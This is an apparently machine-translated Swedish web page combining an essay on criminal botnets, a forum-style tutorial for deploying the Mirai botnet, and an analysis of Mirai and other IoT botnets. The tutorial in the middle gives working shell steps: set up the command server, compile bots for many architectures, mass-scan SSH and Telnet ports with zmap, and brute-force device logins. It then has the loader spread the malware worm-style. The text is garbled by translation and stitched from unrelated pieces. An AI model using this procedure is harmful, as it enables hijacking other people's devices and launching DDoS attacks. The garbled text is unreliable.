Ladda ner källkodspaketet mirai. Installera och konfigurera Mirai botnet

Attackerna från Mirai botnet på den amerikanska DNS-leverantören Dyn 2016 orsakade utbredd resonans och väckte ökad uppmärksamhet på botnät. Men jämfört med hur moderna cyberbrottslingar använder botnät idag, kan attacker på Dyn verka som barnsliga upptåg. Kriminella lärde sig snabbt att använda botnät för att lansera sofistikerad skadlig programvara som kunde bygga hela infrastrukturer från infekterade datorer och andra Internet-anslutna enheter för att generera olagliga vinster i massiv skala.

De brottsbekämpande myndigheterna har gjort vissa framsteg under de senaste åren när det gäller att hantera botnetrelaterad brottslig verksamhet, men hittills räcker naturligtvis inte dessa ansträngningar för att öppna ett tillräckligt gap i botnät som drivs av cyberbrottslingar. Här är några anmärkningsvärda exempel:

• Det amerikanska justitiedepartementet har åtalat två unga män för deras roll i utvecklingen och användningen av Mirai botnet: 21-åriga Paras Jha och 20-åriga Josiah White. De anklagas för att ha organiserat och genomfört DDoS-attacker mot företag och sedan krävt en lösen för att stoppa dem, samt att de säljer dessa företag "tjänster" för att förhindra liknande attacker i framtiden.
• De spanska myndigheterna arresterade en del av en gränsöverskridande operation på Förenta staternas begäran en bosatt i St. Petersburg, Peter Levashov, känd i cyberkriminella kretsar som Peter Severa. Han körde Kelihos, en av de längstgående botnätterna på Internet, som beräknas ha infekterat cirka 100 000 datorer. Förutom utpressning använde Peter Levashov aktivt Kelihos för att organisera skräppostmeddelanden och laddade $ 200 - $ 500 per miljon meddelanden.
• Förra året arresterades två israeliska tonåringar på anklagelser om att ha organiserat DDoS-attacker. Paret lyckades tjäna cirka 600 tusen $ och genomförde cirka 150 tusen DDoS-attacker.

Botnät är datornätverk som består av ett stort antal datorer eller andra enheter anslutna till Internet, på vilka, utan deras ägares kunskap, laddas ner och lanseras autonom programvara - bots. Intressant nog utvecklades själva botsna som programverktyg för att automatisera icke-kriminella, repetitiva och repetitiva uppgifter. Ironiskt nog designades en av de första framgångsrika bots, känd som Eggdrop, och skapades 1993, för att hantera och skydda Internet Relay Chat (IRC) -kanaler från yttre försök att ta över. Men kriminella lärde sig snabbt att utnyttja bottenätets kraft genom att använda dem som globala, nästan automatiserade, vinstgivande system.

Under denna tid har botnet-skadlig programvara utvecklats avsevärt, och nu kan det använda olika attackmetoder som förekommer samtidigt i flera riktningar. Dessutom ser "botekonomi" extremt attraktiv utifrån cyberkriminella. Först och främst finns det praktiskt taget inga infrastrukturkostnader, eftersom komprometterade datorer och annan utrustning med Internet-åtkomst används för att organisera ett nätverk av infekterade maskiner, naturligtvis utan kunskap från ägarna till dessa enheter. Denna frihet från investeringar i infrastruktur innebär att brottslingarnas vinster effektivt kommer att motsvara deras inkomst från olaglig verksamhet. Förutom att kunna använda en så ”lönsam” infrastruktur är anonymitet också oerhört viktigt för cyberbrottslingar. För att göra detta, när de kräver lösen, använder de främst sådana "ospårbara" kryptokurser som Bitcoin. Av dessa skäl har botnät blivit den föredragna plattformen för internetbrott.

När det gäller implementering av olika affärsmodeller är botnät en utmärkt plattform för att lansera olika skadliga funktioner som ger olagliga intäkter till cyberbrottslingar:

• Snabb och utbredd distribution av e-postmeddelanden som innehåller ransomware ransomware.
• Som plattform för att öka antalet klick på länken.
• Öppnar proxyservrar för anonym Internet-åtkomst.
• Brute force (eller brute force) försöker hacka andra Internet-system.
• Att skicka bulk-e-postmeddelanden och vara värd för falska webbplatser för storskalig phishing.
• Stela CD-nycklar eller annan licensierad data för programvara.
• Stöld av personlig identifieringsinformation.
• Hämta kreditkortsinformation och annan bankkontoinformation, inklusive PIN-koder eller "hemliga" lösenord.
• Installera keyloggers för att fånga all data som användaren skriver in i systemet.

Hur skapar jag ett botnet?

En viktig faktor som bidrar till populariteten för användning av botnet bland cyberbrottslingar idag är den relativa lättheten med vilken olika komponenter i botnet malware kan monteras, ändras och förbättras. Möjligheten att snabbt skapa ett botnet dök tillbaka 2015, då källkoden för LizardStresser, en DDoS-attackverktygssats skapad av den berömda hackergruppen Lizard Squad, blev allmänt tillgänglig. Alla skolbarn kan nu ladda ner ett botnet för att utföra DDOS-attacker (vilket de redan gör, som nyhetsställen runt om i världen skriver).

Den lättillgängliga nedladdningen och lättanvända LizardStresser-koden innehåller några sofistikerade tekniker för att utföra DDoS-attacker: hålla TCP-anslutningar öppna, skicka slumpmässiga skräpsträngar till en TCP- eller UDP-port eller skicka TCP-paket igen med givna värdena på flaggorna. Malwaren inkluderade också en mekanism för att slumpmässigt köra skalkommandon, vilket är oerhört användbart för att ladda ner uppdaterade versioner av LizardStresser med nya kommandon och en uppdaterad lista över övervakade enheter, samt för att installera annan skadlig programvara på en infekterad enhet. Sedan dess har källkoderna för andra skadliga program för organisering och kontroll av botnät publicerats, inklusive först och främst Mirai-programvaran, vilket dramatiskt reducerade den "högteknologiska barriären" till början av kriminell verksamhet och samtidigt ökade möjligheterna till vinst och flexibilitet i att använda botnät.

Hur Internet of Things (IoT) blev en klondike för att skapa botnät

När det gäller antalet infekterade enheter och trafiken som genererats av dem under attacker, hade den massiva användningen av oskyddade IoT-enheter en explosiv effekt, vilket ledde till att botnät uppstod i en aldrig tidigare skådad skala. Så till exempel sommaren 2016, före och direkt under OS i Rio de Janeiro, använde en av botnät som skapades på grundval av programvaruskoden LizardStresser huvudsakligen cirka 10 tusen infekterade IoT-enheter (främst webbkameror ) att genomföra flera långsiktiga DDoS-attacker med en kvarhållen kapacitet på mer än 400 Gbps och når 540 Gbps under sin topp. Vi noterar också att enligt uppskattningar kunde det ursprungliga Mirai botnet kompromissa med cirka 500 tusen IoT-enheter runt om i världen.

Trots att många tillverkare har gjort vissa ändringar efter sådana attacker kommer de flesta IoT-enheter fortfarande med ett fabriksinställt användarnamn och lösenord eller med kända säkerhetsproblem. För att spara tid och pengar duplicerar vissa tillverkare regelbundet sin hårdvara och mjukvara för olika klasser av enheter. Som ett resultat kan standardlösenorden som används för att kontrollera källenheten tillämpas på många helt olika enheter. Därför har miljarder av osäkra IoT-enheter redan distribuerats. Och trots att den beräknade tillväxten i antalet har avtagit (om än något) kan den förväntade ökningen av den globala flottan av "potentiellt farliga" IoT-enheter under överskådlig framtid inte annat än chocka (se diagram nedan).

Många IoT-enheter är bra för obehörig användning som en del av kriminella botnät eftersom:

• De flesta av dem är oöverskådliga, med andra ord, de fungerar utan korrekt kontroll från systemadministratören, vilket gör deras användning som anonyma proxyer extremt effektiv.
• De är vanligtvis online 24x7, vilket innebär att de är tillgängliga för att utföra attacker när som helst, och som regel utan bandbreddbegränsning eller trafikfiltrering.
• De använder ofta en neddragen version av operativsystemet baserat på Linux-familjen. Och botnet-skadlig programvara kan enkelt kompileras för allmänt använda arkitekturer, främst ARM / MIPS / x86.
• Ett avdraget operativsystem betyder automatiskt färre säkerhetsfunktioner, inklusive rapportering, så de flesta hot blir obemärkt av ägarna till dessa enheter.

Här är ytterligare ett nytt exempel för att hjälpa dig förstå kraften som moderna kriminella botnetinfrastrukturer kan ha: I november 2017 skickade Necurs botnet ut en ny stam av Scarab ransomware-virus. Som ett resultat av massakampanjen skickades cirka 12,5 miljoner infekterade e-postmeddelanden, det vill säga leveransgraden var mer än 2 miljoner e-postmeddelanden per timme. Förresten sågs samma botnet sprida Dridex- och Trickbot-bank-trojanerna, samt Locky- och Jans ransomware-virus.

Slutsatser

Den gynnsamma situationen för cyberbrottslingar under de senaste åren, i samband med den höga tillgängligheten och användarvänligheten av mer sofistikerade och flexibla skadliga program för botnät, i kombination med en betydande ökning av antalet oskyddade IoT-enheter, har gjort kriminella botnät till en viktig del av den växande digitala underjordiska ekonomin. I denna ekonomi finns det marknader för försäljning av olagligt erhållna uppgifter, genomförande av skadliga åtgärder mot specifika mål inom ramen för tillhandahållande av tjänster för hyra och till och med för deras egen valuta. Och alla prognoser från analytiker och säkerhetsspecialister låter extremt nedslående - i överskådlig framtid kommer situationen med olaglig användning av botnät för att få olagliga vinster bara bli värre.

Den eviga paranoiden, Anton Kochukov.

Se även:

Vi behöver två VPS KVM-servrar och en domän. Virtualisering är exakt KVM, OpenVZ vid denna tid.

Jag tar servrarna här -

På en server kommer vi att installera själva botnet, på den andra skannar vi bots. (Brutalize)

VIKTIG. Servrar måste vara Debian 8 baserade och ha minst 1 GB RAM.

Någon domän, ingen skillnad.

Tyvärr, naturligtvis, men jag kommer inte att säga dig hur man binder en domän till en VPS. Det är inte svårt, du kan ta reda på det själv.

Spackel och vi börjar.

# apt-get update -y

# apt-get upgrade -y

# apt-get install unzip gcc golang elektrisk staketskärm sudo git-y

# apt-get install mysql-server -y

# apt-get install mysql-client -y

# apt-get install apache2 -y

När du installerar MySQL måste du skapa ett MySQL-lösenord för rotanvändaren. Du kan tänka på ett normalt lösenord, utan "qwerty"

Skriv ner det någonstans, vi kommer fortfarande att behöva det.

# sudo apt-get install curl git mercurial make binutils bison gcc build-essential -y

# bash< <(curl -s -S -L

Du måste vara registrerad för att se länkar.

)

# gvm installera go1.4

# gvm use go1.4 [- defef]

# gvm installera go1.4 -B

# gvm använd go1.4

# export GOROOT_BOOTSTRAP \u003d $ GOROOT

# gvm installera go1.5

# gvm använd go1.5

# gvm installera go1.8

# gvm använd go1.8

När du har installerat alla verktyg laddar du ner botkällorna -

Du måste vara registrerad för att se länkar.

Och ladda upp den till servern. Team wget, eller helt enkelt genom programmet WinSCP.

# unzip Mirai-Source-Code-master.zip

# cd Mirai-Source-Code-Master / mirai / tools

# gcc enc.c -o enc

# ./enc sträng ******* (vi skriver vår domän, som vi skruvade till servern) och trycker på Enter.

Här ser du följande text -

XOR "ing 14 byte data ...

\\ x41 \\ x4C \\ x41 \\ x0C \\ x41 \\ x4A \\ x43 \\ x4C \\ x45 \\ x47 \\ x4F \\ x47 \\ x0C \\ x41 \\ x4D \\ x4F \\ x22

14 - här kommer du att ha ett annat nummer, så oroa dig inte, allt är korrekt.

Vi kopierar all denna text.

Öppna redigeraren genom nano eller genom WinSCP fil table.c som finns i mappen mirai / bot

Måste se detta -

Du måste vara registrerad för att se länkar.

Linje add_entry (TABLE_CNC_DOMAIN - ändra allt i citat till din egen text som du just har kopierat. Istället " 30 " vi skriver vårt nummer, som vi också bara kopierade. Vi gör samma sak med strängen add_entry (TABLE_SCAN_CB_DOMAIN

Spara och stäng redigeraren.

Öppna filen med redigeraren mirai / cnc / main.go

Vi ser detta -

Du måste vara registrerad för att se länkar.

"127.0.0.1" ändra till "127.0.0.1:3306"

"Lösenord" vi ändrar lösenordet som vi angav tidigare till vår MySQL. "

Spara filen och stäng redigeraren.

Kopiera bara all denna skitsnack, jag kommer inte säga varför du behöver det -

# mkdir / etc / xcompile

# cd / etc / xcompile

# wget

Du måste vara registrerad för att se länkar.

# wget

Du måste vara registrerad för att se länkar.

# wget

Du måste vara registrerad för att se länkar.

# wget

Du måste vara registrerad för att se länkar.

# wget

Du måste vara registrerad för att se länkar.

# wget

Du måste vara registrerad för att se länkar.

# wget

Du måste vara registrerad för att se länkar.

# wget

Du måste vara registrerad för att se länkar.

# wget

Du måste vara registrerad för att se länkar.

# tar -jxf cross-compiler-armv4l.tar.bz2

# tar -jxf cross-compiler-i586.tar.bz2

# tar -jxf cross-compiler-m68k.tar.bz2

# tar -jxf cross-compiler-mips.tar.bz2

# tar -jxf cross-compiler-mipsel.tar.bz2

# tar -jxf cross-compiler-powerpc.tar.bz2

# tar -jxf cross-compiler-sh4.tar.bz2

# tar -jxf cross-compiler-sparc.tar.bz2

# tar -jxf cross-compiler-armv6l.tar.bz2

# rm * .tar.bz2

# mv cross-compiler-armv4l armv4l

# mv cross-compiler-i586 i586

# mv cross-compiler-m68k m68k

# mv cross-compiler-mips mips

# mv cross-compiler-mipsel mipsel

# mv cross-compiler-powerpc powerpc

# mv cross-compiler-sh4 sh4

# mv cross-compiler-sparc sparc

# mv cross-compiler-armv6l armv6l

# export PATH \u003d $ PATH: / etc / xcompile / armv4l / bin

# export PATH \u003d $ PATH: / etc / xcompile / i586 / bin

# export PATH \u003d $ PATH: / etc / xcompile / m68k / bin

# export PATH \u003d $ PATH: / etc / xcompile / mips / bin

# export PATH \u003d $ PATH: / etc / xcompile / mipsel / bin

# export PATH \u003d $ PATH: / etc / xcompile / powerpc / bin

# export PATH \u003d $ PATH: / etc / xcompile / powerpc-440fp / bin

# export PATH \u003d $ PATH: / etc / xcompile / sh4 / bin

# export PATH \u003d $ PATH: / etc / xcompile / sparc / bin

# export PATH \u003d $ PATH: / etc / xcompile / armv6l / bin

# export PATH \u003d $ PATH: / usr / local / go / bin

# export GOPATH \u003d $ HOME / Documents / go

# gå och få github.com/go-sql-driver/mysql

# go get github.com/mattn/go-shellwords

# cd Mirai-Source-Code-master / mirai

# ./build.sh felsöka telnet

# ./build.sh släpper telnet

# mv mirai * / var / www / html

# cd / var / www / html

# mkdir-fack

# mv * fack /

Nu MySQL.

# mysql -u root -p

De kommer att be om ett lösenord. Ange lösenordet som du tidigare ställt in.

# skapa databas mirai;

# använd mirai

Nu kopierar vi all text härifrån -

Du måste vara registrerad för att se länkar.

Klistra in och tryck på Enter.

Kopiera texten härifrån -

Du måste vara registrerad för att se länkar.

Istället anna-senpai skriv din inloggning. Några. Det är samma sak med myawesomepassword. Vi kommer att behöva denna information för att komma åt botens kontrollpanel.

Det borde vara så här - INSTÄLL IN I användare VÄRDER (NULL, "pizdec", "zaebalsjapisatj", 0, 0, 0, 0, -1, 1, 30, "");

Kopiera, klistra in, tryck på Enter.

Nu kan du gå ut.

Nästan klar.

# cd Mirai-Source-Code-master / mirai / release

# peka på prompt.txt

# skärm ./cnc

Måste se inskriptionen MySQL DB öppnades

Stäng inte den här sessionen, öppna en ny.

Du måste vara registrerad för att se länkar.

I stället för *******, skriv din egen domän och klicka på Öppna.

Ange användarnamn och lösenord, i mitt fall är det -

zaebalsjapisatj

Det är det, vi är i botens kontrollpanel.

Nu behöver vi bots. Allt är enkelt här, inga installationer behövs.

Låt oss konfigurera laddaren.

Lastare behövs så att bots kan läggas till från textfiler. Låt oss säga att vi skrev LoT-enheter (routrar, kameror, telefoner) och för att lägga till dem i botten behöver vi en lastare.

Lastare är också en "mask"

Vi ansluter till vår server via PuTTY och WinSCP.

Med WinSCP hittar vi filen main.c i mappen Mirai-Source-Code-master / dlr

Vi skriver IP: n på vår server som på skärmdumpen -

Du måste vara registrerad för att se länkar.

Vi lämnar komma, som det borde vara. Spara och stäng.

Nu med PyTTY gå till vår server och skriva -

# cd Mirai-Source-Code-master / dlr

# chmod 777 *

# ./build.sh

# cd release

# mv dlr * ~ / Mirai-Source-Code-master / loader / fack

Låt oss nu öppna WinSCP och hitta filen main.c i mappen Mirai-Source-Code-master / loader / src

Byt till din IP som på skärmdumpen -

Du måste vara registrerad för att se länkar.

Spara och stäng.

Genom Spackel -

# ./build.sh

Genom WinSCP öppna filen scanListen.gosom finns i mappen Mirai-Source-Code-master / mirai / tools

Ändra till din server-IP -

Du måste vara registrerad för att se länkar.

Sedan med PyTTY -

# cd Mirai-Source-Code-master / mirai / tools

# go build scanListen.go

Nu har vi en ny fil - scanListen (utan .gå , bara scanListen)

scanListen måste flytta till mappen Mirai-Source-Code-master / loader

Bara använda WinSCP vi kastar den i mappen lastare

Låt oss nu kolla om allt fungerar

# ./loader

Om du ser vad som finns på skärmen är allt korrekt -

Du måste vara registrerad för att se länkar.

Om du har fel, skriv till ämnet, så hjälper jag.

För att ladda ner bots från listan, släpp textredigeraren i mappen lastare och vi skriver kommandot -

# kattlista.txt | ./lastare

Allt, alla bots som du skrev kommer att vara med dig, kommer att sätta platser på ditt kommando.

Jag använde personligen inte den här metoden, jag hittade ett enklare sätt.

Här behöver vi en andra server. Också på Debian 8.

# apt-get update -y

# apt-get upgrade -y

# apt-get install python-paramiko -y

# apt-get install zmap -y

zmap vi måste skanna portar. Principen för arbete är densamma som KPortScan, bara 50 gånger snabbare.

Vi kopierar all kod härifrån -

Du måste vara registrerad för att se länkar.

Och spara som scan.py

Här kan du lägga till dina lösenord och inloggningar -

Du måste vara registrerad för att se länkar.

Sträng combo rör inte!

Här måste du registrera IP-adressen för servern som botten är installerad på -

Du måste vara registrerad för att se länkar.

Vi ändrar allt och sparar.

Vi kastar scan.py-filen var som helst på vår server. På den andra servern, som endast är avsedd för skanning, den som botten inte rörs på.

Vi behöver IP: erna för att skanna.

#zmap -p22 -o lista.txt -B 100M (du kan också skanna andra portar, jag skannade alltid 22 eller 23)

Alla resultat finns i en fil list.txt

Efter att ha samlat in IP-filen (desto mer desto bättre) list.txt vi kastar bredvid filen scan.py och skriv -

# python scan.py list.txt 500

Det är det, vi sitter och tittar på hur vår botnet växer.

När du har minst 200 bots kan du starta lastaren.

För att göra detta, gå till servern där botnet är installerat och -

# cd Mirai-Source-Code-master / loader

# ulimit -n 9999999

# ./scanListen | ./lastare

Nu kommer botten att fungera enligt "mask" -principen och avsluta fler bots.

De två mest kända och mest utbredda IoT-botnätterna - Mirai och Gafgyt - fortsätter att spridas. Nya varianter av dessa skadliga program har upptäckts som riktar sig till företagssektorn. Huvudfaren för dessa cyberhot är välorganiserade och tillräckligt kraftfulla DDoS-attacker.

Anledningen till förekomsten av dessa två skadliga program ligger i den sammanslagna källkoden som blev tillgänglig för allmänheten för flera år sedan. Blivande cyberbrottslingar började omedelbart uppfinna sina egna skadliga program baserade på det.

I de flesta fall, på grund av inkompetensen hos angriparna, representerade Mirai och Gafgyt-klonerna inga allvarliga projekt och medförde inte betydande förändringar i deras kapacitet.

De senaste botnetvarianterna har emellertid visat en trend att infektera företagsenheter. I en rapport från enhet 42, Palo Alto Networks-teamet, har de nya proverna från Mirai och Gafgyt lagt till ett antal nya exploater i deras arsenal som utnyttjar gamla sårbarheter.

Mirai attackerar nu system som kör oöverträffade Apache Struts (vilket är hur det hackades förra året). Patch för CVE-2017-5638-felen har funnits i över ett år, men naturligtvis har inte alla uppdaterat sina installationer.

Mirai har för närvarande 16 exploater, varav de flesta är utformade för att kompromissa med enheter som routrar, NVR: er och olika kameror.

Gafgyt (även känd som Baslite) attackerar också affärshårdvara som är inriktad på den nyligen upptäckta sårbarheten CVE-2018-9866. Denna kritiska säkerhetsfel påverkar versioner som inte stöds av SonicWalls Global Management System (GMS). Enhet 42 forskare fångade de nya proverna den 5 augusti, mindre än en vecka efter att Metasploit-modulen för denna sårbarhet publicerades.

Enheter som är infekterade av Gafgyt kan skanna annan utrustning efter olika säkerhetsproblem och attackera dem med kända exploater. En annan typ av attack som denna skadlig programvara kan utföra, Blacknurse, är en ICMP-attack som påverkar CPU-belastningen kraftigt, vilket leder till ett förnekande av tjänst.

Experterna fann också att dessa två nya botnetvarianter var värd på samma domän. Detta bevisar att samma cyberkriminalitet eller grupp av dem ligger bakom dem.

I slutet av förra månaden rapporterade vi det. Sådana uppgifter finns i Global Threat Index-rapporten för juli 2018.

Och redan denna månad avslöjade brottsbekämpande personer identiteten bakom en av de mest berömda Mirai-efterträdarna - Satori. Det visade sig att internetkriminaliteten för närvarande står inför anklagelser.

Med den växande populariteten och omfattningen av Internet of Things började dess enheter användas av cyberbrottslingar som en plattform för att organisera de mest kraftfulla cyberattackerna. Allvarligheten och antalet högprofilerade säkerhetsincidenter med sådana enheter har visat att de är den svagaste länken i säkerhetskedjan i moderna datornätverk. Och även om datorkraften hos de flesta ämnen på Internet of Things är långt ifrån kapaciteten på en dator, består dess brist av antalet enheter kombinerade till en enda helhet. Alla av dem är kontinuerligt anslutna till nätverket, och ofta, när de arbetar i fabrikskonfigurationen, blir de en välsmakande småbit för knäckare. Den stora storleken, den utbredda distributionen och den svaga säkerheten för IoT-enheter har redan lockat många angripare som använder dem för att aktivt arrangera DDoS-attacker.

"Framtiden" är redan här

Ett nyligen välkänt exempel är Mirai botnet (från japanska för "framtid". Ungefär. ed.), upptäcktes först i augusti 2016 av MalwareMustDie-forskningsgruppen. Själva skadlig programvaran, tillsammans med dess många varianter och imitatorer, har blivit källorna till de mest kraftfulla DDoS-attackerna i IT-branschens historia.

I september 2016 började webbplatsen för datasäkerhetskonsult Brian Krebs att ta emot trafik med en hastighet av 620 Gb / s, vilket är beställningar av större storlek än den nivå på vilken de flesta platser misslyckas. Ungefär samtidigt träffade en ännu kraftigare DDoS-attack av Mirai (1,1 Tbps) OVH, en fransk leverantör av webbhotell och molntjänster. Snart publicerades källkoden för skadlig programvara, varefter angriparna började hyra botnät baserade på den, innehållande upp till 400 tusen enheter. En serie Mirai-attacker följde, varav den mest berömda, mot tjänsteleverantören Dyn, slog ut hundratals webbplatser under flera timmar i oktober 2016, inklusive Twitter, Netflix, Reddit och GitHub.

Mirai sprider vanligtvis genom att först infektera webbkameror, DVR: er, routrar osv. Som kör en av BusyBox-versionerna. Den skadliga skadan upptäcker sedan administrativa referenser för andra IoT-enheter med brute-force, med en liten ordlista med namn-lösenordspar som är typiska för tillverkare av nätverksenheter.

Därefter började Mirai-mutationer bokstavligen visas dagligen, och det faktum att de bibehöll förmågan att reproducera och skada med samma metoder som originalet indikerar IoT-enhetstillverkarens kroniska försummelse för de enklaste skyddsmetoderna. Märkligt nog har botnät som bildats av sådana enheter undersökts dåligt trots faran att alltmer sofistikerade attacker baserade på dem potentiellt kan undergräva hela Internetinfrastrukturen.

Hur Mirai fungerar

Mirai startar en DDoS-attack mot målservrar och aktivt sprider sig genom osäkra IoT-enheter.

Huvudkomponenter

Mirai botnet har fyra huvudkomponenter. En bot är en skadlig programvara som infekterar enheter och sprider en "infektion" bland felkonfigurerade enheter och sedan en attackerande målserver när den får ett kommando från en botmaster - en person som kontrollerar bots. Kontrollservern ger botmästaren ett gränssnitt för att kontrollera status för botnet och initiera nya DDoS-attacker. Kommunikation mellan element i botnetinfrastrukturen sker vanligtvis via det anonyma Tor-nätverket. Laddaren säkerställer distribution av körbara filer för alla hårdvaruplattformar (det finns totalt 18 av dem, inklusive ARM, MIPS, x86, etc.) genom direktkontakt med nya offer. Rapportservern har en databas med information om alla enheter i botnet, och nyinfekterade värdar kommunicerar vanligtvis direkt med denna server.

Botnet-aktivitet och kommunikationsschema

Mirai skannar först portarna 23 och 2323 efter slumpmässiga offentliga IP-adresser. Vissa adresser är uteslutna (förmodligen för att inte uppmärksamma statliga myndigheter) - till exempel tillhörande US Post, Pentagon, IANA, liksom företagen General Electric och Hewlett-Packard. I fig. 1 visar huvudstadierna för aktivitet och datautbyte i ett botnet.

Steg 1.Botten utför ett brute-force-angrepp på referenser för IoT-enheter som inte har fabrikskonfigurerats. Det finns 62 möjliga namn-lösenordspar i Mirai-ordboken.

Steg 2.Efter att ha upptäckt de operativa referenser och fått tillgång till kommandoraden eller enhetens GUI, skickar boten sina egenskaper till rapportservern via en annan port.

Steg 3.Botmaster kontrollerar regelbundet potentiella mål och botnetets nuvarande tillstånd genom att kommunicera med rapportservern via Tor.

Steg 4.Efter att ha valt sårbara enheter för infektion, ger botmaster ut lämpliga kommandon till laddaren med alla nödvändiga detaljer, inklusive IP-adresser och information om hårdvaruarkitekturen.

Steg 5.Startladdaren kommer in i den berörda enhetens system och tvingar den att ladda och köra motsvarande körbar fil för skadlig programvara. Start startas vanligtvis med hjälp av GNU Wget-verktyget via TFTP. Det är anmärkningsvärt att så snart skadlig programvara lanseras försöker den försvara sig mot konkurrenter genom att blockera portar genom vilka infektioner ofta uppstår, inklusive Telnet och SSH. I detta skede kan den nyligen skapade bot-instansen redan kommunicera med C & C-servern och ta emot kommandon från den för att starta en attack. Detta görs genom att lösa domännamnet som är hårdkodat i körbara (Mirai är standard till cnc.changeme.com). Denna metod, som används istället för direkt åtkomst till IP-adressen, tillåter botmaster att ändra IP-adresserna för hanteringsservern utan att ändra binärerna och ytterligare informationsutbyte.

Steg 6.Botmästaren instruerar alla instanser av bot att starta en attack mot målservern och överför lämpliga parametrar genom kontrollservern, inklusive attackens typ och varaktighet, såväl som serverns IP-adress och botinstansen.

Steg 7.Bots börjar attackera målet med hjälp av ett av ett dussin tillgängliga metoder, inklusive Generic Routing Encapsulation, TCP och HTTP-översvämningar.

Egenskaper av Mirai

Till skillnad från andra liknande skadlig programvara försöker Mirai inte undvika upptäckt. Nästan alla infektionsstadier har karakteristiska funktioner som kan identifieras med hjälp av enkel nätverksanalys: brute-force of vissa referenser via vissa portar; skicka specialutarbetade rapporter; laddning av generiska binärer; meddelanden för att behålla anslutningen; överföring av kontrollkommandon med en karakteristisk struktur; nästan fullständig frånvaro av slumpmässiga element i attacktrafiken.

I fig. 2 visar standardkommunikationslägen mellan Mirai-nedladdaren och en IoT-enhet som redan är infekterad men ännu inte startat attacken. Sessionens varaktighet varierar, men pakettyper och storlekar, såväl som meddelandesekvensen, följer mönster som indikerar infektion med den här skadliga programvaran.

Mirai-varianter

Det verkar som att publiceringen av Mirai-källkoden och dess relativt höga nätbuller borde ha lett till att effektiva erkännande- och skyddsmekanismer snabbt uppstod. Detta hände dock inte: bara två månader efter publicering av källkoden, antalet botstillfällen mer än fördubblats, från 213 tusen till 493 tusen, och ett stort antal av dess varianter dök upp. Ännu mer än ett år efter upptäckten av Mirai använde robotarna fortfarande svaga konfigurationer av enheter av samma typ som ursprungligen.

De flesta Mirai-infektioner inträffar via TCP-portarna 23 eller 2323, men i november 2016 upptäcktes stammar av viruset som har åtkomst till andra portar, inklusive 7547, som ISP: er använder för att fjärrkontrollera klienters routrar. Samma månad lämnade ett av dessa Mirai-alternativ nästan en miljon abonnenter på Deutsche Telekom utan internetåtkomst.

I februari 2017 lanserades en 54-timmars DDoS-attack med Mirai-varianten mot en amerikansk högskola. Nästa månad dök en annan variant ut - den här gången med inbyggd bitcoin-gruvdrift, även om det enligt uppskattningar att använda IoT-enheter för dessa ändamål knappast kunde ge mycket inkomst.

I april började Persirai, en annan botnet som byggdes med Mirai codebase, aktivitet. Detta zombie-nätverk upptäcktes av Trend Micro-forskare, som gav det ett namn genom att kombinera orden persiska och Mirai - det första valdes baserat på det påstådda iranska ursprunget till skadlig programvara. Den försöker få åtkomst till kontrollgränssnittet för vissa tillverkares webbkameror via TCP-port 81. Om det lyckas infiltrerar det routern med hjälp av en UPnP-sårbarhet och laddar ner, startar och tar bort ytterligare binära filer. Istället för att tvinga uppgifterna att gå in i kamerans gränssnitt utnyttjar viruset en fel på noll dagar som tillåter direkt hämtning av en lösenordsfil. En distribuerad DoS-attack utförs genom en UDP-översvämning. Det uppskattas att det fanns cirka 120 000 enheter på webben som var sårbara för Persirai.

Andra IoT-baserade botnät

Genom att förlita sig på de grundläggande principerna för Mirai började skaparna av ny skadlig programvara använda andra, mer sofistikerade mekanismer för att öka kraften och maskera zombie-nätverkens aktivitet.

I augusti 2016 rapporterade forskare från MalwareMustDie om det första IoT-botnet som byggdes med hjälp av Lua-skriptspråk. De flesta av botnets armé bestod av ARM-baserade kabelmodem med Linux. Malwaren har komplexa funktioner - till exempel skapar den en krypterad kommunikationskanal med kommandot och kontrollservern och sätter speciella iptables-regler för att skydda infekterade enheter från konkurrenter.

Hajime-botnet, som upptäcktes i oktober 2016 av Rapidity Networks, använder en infektionsmetod som liknar Mirai. Men istället för en centraliserad arkitektur, förlitar Hajime sig på ett distribuerat kommunikationssystem och använder BitTorrent Distribuerad Hash Tag (Protokoll) för att upptäcka kamrater (kamrater i nätverket) och använder uTorrent-transportprotokollet för att utbyta data. Alla meddelanden är krypterade med RC4-protokollet. Hittills har Hajime inte visat sig på den negativa sidan, tvärtom, det eliminerar potentiella källor till sårbarheter i IoT-enheter som används av botnät som Mirai, i samband med vilken det har hävdats att det skapades av en viss "Robin Hood." Men det verkliga syftet med botnet var ett mysterium.

BrickerBot botnet, som, precis som Mirai, infekterar BusyBox, upptäcktes av Radware i april 2017. Med hjälp av de referenser som är inställda som standard i SSH-tjänsten, såväl som felaktiga konfigurationer och kända sårbarheter, försöker skadlig programvara starta permanenta avslag på tjänsten (PDoS, Permanent DoS) mot IoT-enheter, det vill säga förstörande nog för att tvinga omkonfiguration eller utbyte av utrustning. BrickerBot skadar enhetens firmware, tar bort filer på dem och ändrar nätverksinställningar.

lektioner

Den utbredda skadan som orsakats av attacker på Mirai, dess varianter och liknande botnät har tydligt visat de risker som IoT-enheter utgör för World Wide Web. Idag kan ganska enkla virus ta kontroll över sådana enheter och skapa enorma destruktiva arméer av "zombies". Angripare lockas av enkelheten i att odla en population av bots. Det finns fem huvudskäl till varför IoT-enheter är särskilt fördelaktiga för att bygga botnät.

1. Konstant, obehindrad aktivitet.Till skillnad från bärbara datorer och stationära datorer, som ofta slås på och av, fungerar många IoT-enheter (som webbkameror och Wi-Fi-routrar) dygnet runt och uppfattas ofta av värdar som enheter som inte kan infekteras.
2. Brist på skydd.I deras brådska om att komma in på IoT-marknaden försummar många enhetstillverkare säkerheten och fokuserar mer på användbarhet och användbarhet.
3. Brist på kontroll.De flesta IoT-enheter används på ett sätt att glömma bort - efter den första installationen kan sysadmins uppmärksamma dem bara om de slutar fungera normalt.
4. Betydande attackstrafik.Dagens IoT-enheter är kraftfulla och välplacerade för att generera DDoS-trafik som är lika kraftfull som dagens stationära datorer.
5. Icke-interaktiva eller minimalt interaktiva användargränssnitt.Eftersom IoT-enheter vanligtvis kräver minimal användarintervention, kommer infektion sannolikt att bli obemärkt. Men även om det märks kan användare inte hitta enkla sätt att eliminera skadlig programvara än att fysiskt byta ut enheten.

DDoS-attacker från IoT-enheter har förutsagts under lång tid, och idag växer antalet allt mer sofistikerade varianter och imitatorer av Mirai i oroväckande takt. Sådan skadlig programvara kan vanligtvis fungera på många plattformar och kan ha en låg resursförbrukning med ett minimum av RAM. Dessutom är infektionsförfarandet relativt enkelt, vilket gör varje sårbar enhet till en kandidat för att bli en zombie, även om den ofta startas om. De flesta av Internet of Things skadlig programvara som finns idag är lätt att upptäcka och analysera, men nya bots blir mer hemlighetsfull.

